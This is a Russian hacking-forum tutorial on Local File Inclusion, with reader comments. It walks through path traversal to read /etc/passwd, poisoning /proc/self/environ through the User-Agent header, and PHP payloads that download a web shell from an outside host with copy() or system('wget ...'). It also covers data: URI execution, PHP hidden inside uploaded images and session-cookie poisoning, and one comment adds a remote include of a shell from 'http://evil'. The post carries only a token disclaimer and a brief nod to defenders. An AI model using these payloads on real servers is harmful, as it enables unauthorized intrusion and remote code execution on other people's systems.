Что такое LFI и с чем его едят. LFI Иначе говоря, Local File Include. Внимание! Информация предоставленна, исключительно с целью ознакомления. Автор не несёт ответственность за ваши действия. Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере. В общем, грубо говоря, мы можем осуществить чтение php-кода (и не только) из файла при наличии LFI. Мне, да и другим, чаще всего встречается в различных менеджерах файлов. Специально, под такой случай нашёл наглядный пример: http://server/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 Как через эту уязвимость залить шеллл? Обращаемся к одному из лог-файлов: У меня это proc/self/environ будет. Обращаемся к лог-файлу - http://server/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../proc/self/environ%00 и видим следующее: Особенно уделяем внимание данным которые мы передаём, т. е. USER_AGENT (логируется), ACCEPT_ENCODING(не логируется), etc. Добавим в эти данные код: В ответ видим такой ответ: Чтож, всё лучше чем мы думаем — исполняется пхп код! Заливаем наш шелл на народ, чтобы получилась строка — http://site.narod.ru/shell.php Теперь у нас есть два варианта заливки шелла, исполняем этот пхп код <?php copy (http://site.narod.ru/shell.php''), 'temp.php') ?> или этот <?php system('wget http://site.narod.ru/shell.php'); ?> Далее ждём пока страница загрузится, и переходим по адресу http://server/shell.php и наслаждаемся шеллом! Так же можно попробывать выполнить php код прямо в адрессной строке, но это только при большой везучести. http://server/index.php?dir=data:,<?php system('wget http://site.narod.ru/shell.php'); ?> Это при* PHP Version => 5.2.0 allow_url_include = On Так, едем дальше. Часто возникают вопросы, а как залить шелл в виде картинки. Вот ответ: Находишь форум, или другой источник откуда можно загрузить файл изображения. Если анализатор хреновый - он пропустит твою картинку с php кодом внутри, затем можешь исполнить код: http://server/script.php?file=../../../shell.jpg%00 Так, вроде бы с картинками разобрались. Так же уязвимость может быть в сессии. Например: Заходим на уязвимый сайт, пару раз обновляем и смотрим cookies: Копируем данные из Content, и делаем такую ядовитую строку, вместе с линуксовой коммандой uname -a: Showtime! Команда выполнилась, а это значит — ещё один путь для загрузки шелла! Послесловие. По сути эта статья - сборник информации по LFI-injection. Это конечно-же не вся информация о LFI-injection но всё-же надеюсь часть информации, изложенной здесь, поможет системным администраторам и разработчикам принять меры по защите от таких уязвимостей. (с)<cyber-punk>
У меня лишь одно слово - Здорово!!11 Лучшей статьи, где бы так охуенно раскрывалась суть вопроса, я еще не встречал. Автор, срочно в РОА, ну просто срочно!
Вобщем я понимаю немного ироничное отношение некоторых наших юзеров с репутацией, одного я понять не могу- откуда ирония в словах у людей из раздела мировых новостей, либо с раздела- купи-продай.... Вот он эффект толпы- на лицо...
Согласен полностью поэтому и залез в темы созданные Вами ну и сообщения заодно просмотрел Надеюсь это показатель? Или что для Вас является показателем? Скажем так- если циферки в расчет не брать посмотри все сообщения например от Redwood и сравни когда говорил про репутацию- имел именно ввиду такое а не циферки
Ну а что тут еще скажешь, достаточно много времени не заходил на форум, после известного инцидента и смены цвета. Как зашел, сразу увидел много лиц в группах(теперь уже опустевших), и многие из "лиц" меня мягко говоря удивили Ну а уж валовые статьи, которые поперли потом, вызывают у меня просто восторг))) А еще больший восторг, вызывают люди их написавшие, которые несколько месяцев назад сидели в Вопросы по уязв., и задавали вопросы, описаные множество раз в статьях от мемберов. А теперь вот они же пишут свои статьи) Ех, мне бы минусомет ^_^
Мохзе- я думаю что на форуме найдется мало людей которые бы относились к тебе без уважения (это не ирония), никто не оспаривает твоих знаний, и еслиб не инциндент, как ты выразился, твой ник быстро бы менял окраску, но здесь дело в том что например ТС изложил материал так как его понимает сам, на сегодняшний момент, я бы считал статью удавшейся еслиб пошли коменты, где неправ ТС, либо дополнения по теме, а здесь получается что мы даем по рукам творчеству , х.з. мне это показалось не правильным отсюда и мои каменты , всетаки лучше чем вон в соседней теме люди с утра уже яндекс хекают ещеб чуть чуть и им бы это удалось
вообще-то грубо говоря, LFI представляет из себя подключение любого файла на сервере к вызываемому файлу. Что делит LFI на две ветки, либо выполнение содержимого подключаемого файла, либо чтение содержимого подключаемого файла. И вообще в статье нет упоминания про ограничения, про возможности и про сложности при работе с LFI. А вот это вот: уже выходит за рамки LFI так как при allow_url_include = On можно спокойно подключить свой файл из внешнего сервера: vuln.php?targe=http://evil/shell.php? На мой взгляд тут: http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ всё что нужно знать, есть.
2Kusto Но ведь факт, ничего нового не открыл. Оформление на момент прочтения мной было ужасным. Информативность тоже можно выделить в отдельную категорию. Комментарии с мнениями ~"вот блин толпа" тоже комментарии толпы, которая в свою очередь мнит себя выше. Пардон за оффтоп.